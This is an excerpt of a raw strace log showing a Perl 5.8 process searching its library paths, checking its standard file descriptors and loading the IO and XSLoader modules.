7474  07:18:55.920034 stat64("/usr/local/share/perl/5.8.4", 0xbfda0050) = -1 ENOENT (No such file or directory)

7474  07:18:55.920046 stat64("/usr/local/lib/perl/5.8.3", 0xbfda0050) = -1 ENOENT (No such file or directory)

7474  07:18:55.920057 stat64("/usr/local/share/perl/5.8.3", 0xbfda0050) = -1 ENOENT (No such file or directory)

7474  07:18:55.920069 stat64("/usr/local/lib/perl/5.8.2", 0xbfda0050) = -1 ENOENT (No such file or directory)

7474  07:18:55.920081 stat64("/usr/local/share/perl/5.8.2", 0xbfda0050) = -1 ENOENT (No such file or directory)

7474  07:18:55.920093 stat64("/usr/local/lib/perl/5.8.1", 0xbfda0050) = -1 ENOENT (No such file or directory)

7474  07:18:55.920104 stat64("/usr/local/share/perl/5.8.1", 0xbfda0050) = -1 ENOENT (No such file or directory)

7474  07:18:55.920116 stat64("/usr/local/lib/perl/5.8.0", 0xbfda0050) = -1 ENOENT (No such file or directory)

7474  07:18:55.920128 stat64("/usr/local/share/perl/5.8.0", 0xbfda0050) = -1 ENOENT (No such file or directory)

7474  07:18:55.920150 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd9fd48) = -1 ENOTTY (Inappropriate ioctl for device)

7474  07:18:55.920165 _llseek(0, 0, [0], SEEK_CUR) = 0

7474  07:18:55.920177 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd9fd48) = -1 EBADF (Bad file descriptor)

7474  07:18:55.920188 _llseek(1, 0, 0xbfd9fd90, SEEK_CUR) = -1 EBADF (Bad file descriptor)

7474  07:18:55.920199 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd9fd48) = -1 EINVAL (Invalid argument)

7474  07:18:55.920210 _llseek(2, 0, 0xbfd9fd90, SEEK_CUR) = -1 ESPIPE (Illegal seek)

7474  07:18:55.920220 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

7474  07:18:55.920233 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd9fe08) = -1 ENOTTY (Inappropriate ioctl for device)

7474  07:18:55.920244 _llseek(1, 0, [0], SEEK_CUR) = 0

7474  07:18:55.920255 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

7474  07:18:55.920266 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

7474  07:18:55.920285 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

7474  07:18:55.920352 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

7474  07:18:55.920441 getppid()         = 7472

7474  07:18:55.920516 stat64("/etc/perl/IO.pmc", 0xbfd9fafc) = -1 ENOENT (No such file or directory)

7474  07:18:55.920530 stat64("/etc/perl/IO.pm", 0xbfd9fa0c) = -1 ENOENT (No such file or directory)

7474  07:18:55.920544 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbfd9fafc) = -1 ENOENT (No such file or directory)

7474  07:18:55.920560 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbfd9fa0c) = -1 ENOENT (No such file or directory)

7474  07:18:55.920574 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbfd9fafc) = -1 ENOENT (No such file or directory)

7474  07:18:55.920587 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbfd9fa0c) = -1 ENOENT (No such file or directory)

7474  07:18:55.920600 stat64("/usr/lib/perl5/IO.pmc", 0xbfd9fafc) = -1 ENOENT (No such file or directory)

7474  07:18:55.920612 stat64("/usr/lib/perl5/IO.pm", 0xbfd9fa0c) = -1 ENOENT (No such file or directory)

7474  07:18:55.920625 stat64("/usr/share/perl5/IO.pmc", 0xbfd9fafc) = -1 ENOENT (No such file or directory)

7474  07:18:55.920637 stat64("/usr/share/perl5/IO.pm", 0xbfd9fa0c) = -1 ENOENT (No such file or directory)

7474  07:18:55.920650 stat64("/usr/lib/perl/5.8/IO.pmc", 0xbfd9fafc) = -1 ENOENT (No such file or directory)

7474  07:18:55.920663 stat64("/usr/lib/perl/5.8/IO.pm", {st_mode=S_IFREG|0644, st_size=413, ...}) = 0

7474  07:18:55.920684 open("/usr/lib/perl/5.8/IO.pm", O_RDONLY|O_LARGEFILE) = 6

7474  07:18:55.920698 ioctl(6, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd9f818) = -1 ENOTTY (Inappropriate ioctl for device)

7474  07:18:55.920710 _llseek(6, 0, [0], SEEK_CUR) = 0

7474  07:18:55.920733 read(6, "#\n\npackage IO;\n\nuse XSLoader ();\nuse Carp;\nuse strict;\nuse warnings;\n\nour $VERSION = \"1.22\";\nXSLoader::load \'IO\', $VERSION;\n\nsub import {\n    shift;\n\n    warnings::warnif(\'deprecated\', qq{Parameterless \"use IO\" deprecated})\n        if @_ == 0 ;\n    \n    my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir);\n\n    eval join(\"\", map { \"require IO::\" . (/(\\w+)/)[0] . \";\\n\" } @l)\n\tor croak $@;\n}\n\n1;\n\n__END__\n\n", 4096) = 413

7474  07:18:55.920789 stat64("/etc/perl/XSLoader.pmc", 0xbfd9f64c) = -1 ENOENT (No such file or directory)

7474  07:18:55.920803 stat64("/etc/perl/XSLoader.pm", 0xbfd9f55c) = -1 ENOENT (No such file or directory)

7474  07:18:55.920817 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pmc", 0xbfd9f64c) = -1 ENOENT (No such file or directory)

7474  07:18:55.920915 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pm", 0xbfd9f55c) = -1 ENOENT (No such file or directory)

7474  07:18:55.920932 stat64("/usr/local/share/perl/5.8.8/XSLoader.pmc", 0xbfd9f64c) = -1 ENOENT (No such file or directory)

7474  07:18:55.920945 stat64("/usr/local/share/perl/5.8.8/XSLoader.pm", 0xbfd9f55c) = -1 ENOENT (No such file or directory)

7474  07:18:55.920960 stat64("/usr/lib/perl5/XSLoader.pmc", 0xbfd9f64c) = -1 ENOENT (No such file or directory)

